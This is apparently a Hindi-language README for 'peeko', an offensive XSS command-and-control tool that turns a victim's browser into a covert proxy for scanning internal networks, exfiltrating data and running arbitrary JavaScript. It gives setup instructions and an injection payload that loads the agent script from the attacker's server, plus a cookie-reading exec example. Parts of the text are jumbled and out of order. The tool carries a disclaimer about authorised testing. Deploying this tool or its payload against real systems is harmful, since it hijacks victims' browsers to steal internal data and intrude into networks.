
peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
संस्करण: v1.1
peeko एक ब्राउज़र-आधारित XSS-संचालित C2 (कमांड एंड कंट्रोल) उपकरण है जो पीड़ित के ब्राउज़र को आंतरिक नेटवर्क के अंदर एक छिपे हुए प्रॉक्सी के रूप में उपयोग करता है।
इंजेक्ट किए गए XSS पेलोड के माध्यम से, peeko एक केंद्रीय सर्वर से WebSocket कनेक्शन स्थापित करता है, जिससे हमलावर पीड़ित के ब्राउज़र को दूरस्थ रूप से नियंत्रित करके आंतरिक सेवाओं को अनुरोध भेज सकता है, नेटवर्क स्कैन कर सकता है, डेटा एक्सफ़िल्ट्रेट कर सकता है, या यहाँ तक कि मनमाना JavaScript निष्पादित कर सकता है — यह सब बिना एक भी बाइनरी ड्रॉप किए।
.txt या .json के रूप में कॉपी/सेव करने की सुविधारिपॉजिटरी क्लोन करें:
git clone https://github.com/b3rito/peeko.git
cd peeko
निर्भरताएँ स्थापित करें:
make install
(वैकल्पिक) स्क्रिप्ट को निष्पादन योग्य बनाएं:
chmod +x gen-cert.sh start.sh
सेल्फ-साइन्ड TLS प्रमाणपत्र जनरेट करें:
make cert
SERVER-IP प्लेसहोल्डर बदलें:
निम्नलिखित फ़ाइलों को खोलें और संपादित करें:
static/agent.jsstatic/control.htmlSERVER-IP को अपने सर्वर के IP/डोमेन से बदलें:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
सर्वर प्रारंभ करें:
make run
अपने ब्राउज़र में नियंत्रण पैनल खोलें:
192.168.1.0/24, 10.0.0.10-20, आदि।80, 443,8000-8080)exec:... प्रारूप का उपयोग करेंexec:alert(document.cookie);.txt या .json के रूप में कॉपी या एक्सपोर्ट करेंआधुनिक ब्राउज़र नीतियाँ प्रभावित करती हैं कि peeko क्या एक्सेस कर सकता है।
| हेडर | क्या सामग्री पढ़ सकते हैं? | टिप्पणियाँ |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | प्रतिक्रिया तक पूर्ण पहुँच |
| कोई हेडर नहीं | ⚠️ | प्रतिक्रिया अस्पष्ट है |
पीड़ित HTTPS के माध्यम से कनेक्ट होता है। यदि स्कैन किया गया लक्ष्य केवल HTTP का उपयोग करता है:
http:// एंडपॉइंट से नहीं पढ़ सकतापैनेट्रेशन टेस्ट के दौरान, यदि आपको कोई आंतरिक सेवा मिलती है जो Access-Control-Allow-Origin: * के साथ प्रतिक्रिया करती है और HTTPS पर सर्व होती है, तो peeko एक स्टील्थ प्रॉक्सी बन जाता है जो बिना कोई फ़ाइल ड्रॉप किए या आउटबाउंड कनेक्शन खोले, पीड़ित के ब्राउज़र से सीधे आंतरिक डेटा एक्सफ़िल्ट्रेट करने में सक्षम है।
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
जिन वातावरणों में आपके पास स्पष्ट अनुमति है, उनके बाहर peeko का कोई भी उपयोग सख्त रूप से निषिद्ध है।
आप अपने कार्यों के लिए स्वयं ज़िम्मेदार हैं।
द्वारा लिखित: b3rito, mes3hacklab पर और GioPpeTto
https://192.168.30.136:8443/static/control.html
एजेंट इंजेक्ट करें (उदाहरण XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| प्रतिबंधित ओरिजिन |
| ❌ |
| अवरुद्ध या अपठनीय |